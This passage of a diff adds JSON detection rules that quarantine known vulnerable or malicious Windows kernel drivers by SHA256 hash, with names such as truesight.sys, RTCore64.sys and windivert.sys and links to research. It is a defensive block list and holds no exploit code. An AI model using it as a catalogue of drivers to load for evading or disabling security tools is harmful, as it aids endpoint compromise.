+ "last_update": "2026-03-23T11:45:30.832730Z",
+ "creation_date": "2026-03-23T11:45:30.832732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0191860d2680f25783f5a383bdb4d31727e4d25761ccc506655c4f4f30b69228",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f4cb198-2d97-5bde-95a3-ca20486cca49",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144072Z",
+ "creation_date": "2026-03-23T11:45:31.144074Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144080Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05cce97384d67bdd1f52138ba5a3755ccae99652d7b6c464c38feacc6729d5d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f605f93-1e4d-5d13-befe-38f0a03f7da2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605735Z",
+ "creation_date": "2026-03-23T11:45:29.605737Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605742Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "033c98b9b05a33b5c5c4e2f358c38f5f6447d9dc2f9d622fdb9295d85d2a29bc",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f635675-3c68-57b5-a363-13e94cb7c611",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981437Z",
+ "creation_date": "2026-03-23T11:45:29.981439Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981444Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a19fc837ca342d2db43ee8ad7290df48a1b8b85996c58a19ca3530101862a804",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f774cb2-0bcf-5172-a670-8a7fa389d269",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622385Z",
+ "creation_date": "2026-03-23T11:45:29.622387Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4c154a0073bbad3c9f8ab7218e9b3be252ae705c20c568861dae4088f17ffcc",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f80f313-a112-51df-a7fc-cbd00c58d3b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460294Z",
+ "creation_date": "2026-03-23T11:45:30.460297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fded693528f7e6ac1af253e0bd2726607308fdaa904f1e7242ed44e1c0b29ae8",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f8d7fc4-2d78-51e9-b20e-4cc04fda9400",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481061Z",
+ "creation_date": "2026-03-23T11:45:30.481063Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5fbfd7c4ea3db1197ad38d5a945acf6f2f42cb350380cf8ae276bc80b0dedb77",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f9cab69-94fc-590f-a769-2fa2b3fd0953",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815822Z",
+ "creation_date": "2026-03-23T11:45:30.815824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815830Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32bd0edb9daa60175b1dc054f30e28e8dbfa293a32e6c86bfd06bc046eaa2f9e",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fad6ddb-0739-5bfe-9d90-5ed6df9e856e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141468Z",
+ "creation_date": "2026-03-23T11:45:31.141470Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141476Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea623a572ab20d2639ae1555a20d1183b37fe8c19e909a165f63dd6e8f8c6f4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fbf3e25-f6ff-5949-8d31-c95f5108e3f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611291Z",
+ "creation_date": "2026-03-23T11:45:29.611292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e650b4e4b5a95cba582b9749cac4c40e67e854d78eb8494f46f6d11f1fcea4d6",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fc5fc97-2820-59f8-8b0d-8b60e4dad93a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471771Z",
+ "creation_date": "2026-03-23T11:45:30.471774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471783Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3813c1aab1760acb963bcc10d6ea3fddc2976b9e291710756408de392bc9e5d5",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fcc7554-d6ac-5348-94da-2583db967876",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143077Z",
+ "creation_date": "2026-03-23T11:45:32.143079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d23f28169d6e5c09a89e5136a4ff899a3b6f886535bb0254a27dd00a2753c412",
+ "comment": "Vulnerable Kernel Driver (aka msr.sys) [https://www.loldrivers.io/drivers/ee6fa2de-d388-416c-862d-24385c152fad/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fd08b47-80b8-5cc5-9ea5-130a473f6820",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495671Z",
+ "creation_date": "2026-03-23T11:45:31.495673Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495678Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bb9c31c9e971e9fd6b4854ce94078ac55b4cf8e4527ecdb5bfba6ef46d6d778",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fd5c952-1d62-5b9e-b55c-fe0053e50f00",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457366Z",
+ "creation_date": "2026-03-23T11:45:30.457369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457377Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6a53d4cf39b4b0b5069359d0a3b32eb1aa7b56c427487c9f838eb279c6a90d1",
+ "comment": "Malicious Kernel Driver (aka 4748696211bd56c2d93c21cab91e82a5.sys) [https://www.loldrivers.io/drivers/2d6c1da6-17e2-4385-ad93-1430f83bde83/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fd79d01-4916-5629-b28b-49a2c4a1713c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607053Z",
+ "creation_date": "2026-03-23T11:45:29.607056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c2d8e8487de5e7749f9899f6fefa6e7d40b394479449b5027a895392af23349",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fdb3b05-ffc2-5e28-9b3f-f91d49368be4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813588Z",
+ "creation_date": "2026-03-23T11:45:31.813591Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813600Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0d8392881ea337e127c4575edfc882335d810eb6d4cf1055bcb8d0289d38730",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fe65d51-0211-519d-88d3-a81689ff9dc5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985796Z",
+ "creation_date": "2026-03-23T11:45:29.985798Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985803Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0399dd3c395f84cbd6ac2e3e8ca8ee344a0f699b17db0624f936ae4bb4b7953",
+ "comment": "Malicious Kernel Driver (aka wfshbr64.sys) [CVE-2022-42046] [https://github.com/kkent030315/CVE-2022-42046] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2fed0ec5-e714-5669-8d94-0c28cf1d73b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148399Z",
+ "creation_date": "2026-03-23T11:45:31.148401Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148406Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a557758ab1235961be0cdd324f746bc38b75cf9b8873b4c30d24152c03fe8b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ff1235f-4f14-5960-87fb-e478c0a98bea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144340Z",
+ "creation_date": "2026-03-23T11:45:31.144342Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2eb7904ecdbc96a8ea155c0f4d562753e65fc181f14179857cc32c9d9cc5f457",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3001c0f1-06e7-54b5-96e2-2b99bd9896d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145827Z",
+ "creation_date": "2026-03-23T11:45:32.145828Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79d48dd02d288dc1788ab3615e6de3c01e575abd19b27434c0f3f557db43592c",
+ "comment": "Malicious Kernel Driver (aka driver_82d928c5.sys) [https://www.loldrivers.io/drivers/af8ef3c0-8686-4112-992b-86587a4a9060/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3007066e-9172-540a-b8ff-2615432c6898",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144744Z",
+ "creation_date": "2026-03-23T11:45:32.144766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144771Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "49373ea79d942e82873583a6515950acc04c578e75720593383ffb7ba4a28f3b",
+ "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30158fc4-f82c-5215-8746-b8dad77ac989",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479668Z",
+ "creation_date": "2026-03-23T11:45:30.479670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e238d351e16d4909ca394f1db0326a60d33c9ac7b4d78aefcf17a6d9cc72be9",
+ "comment": "Vulnerable Kernel Driver (aka amifldrv64.sys) [https://www.loldrivers.io/drivers/a5eb98bf-2133-46e8-848f-a299ea0ddefa/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "301735eb-d0c2-55d8-8338-4c5f51f2503e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155293Z",
+ "creation_date": "2026-03-23T11:45:31.155295Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155300Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
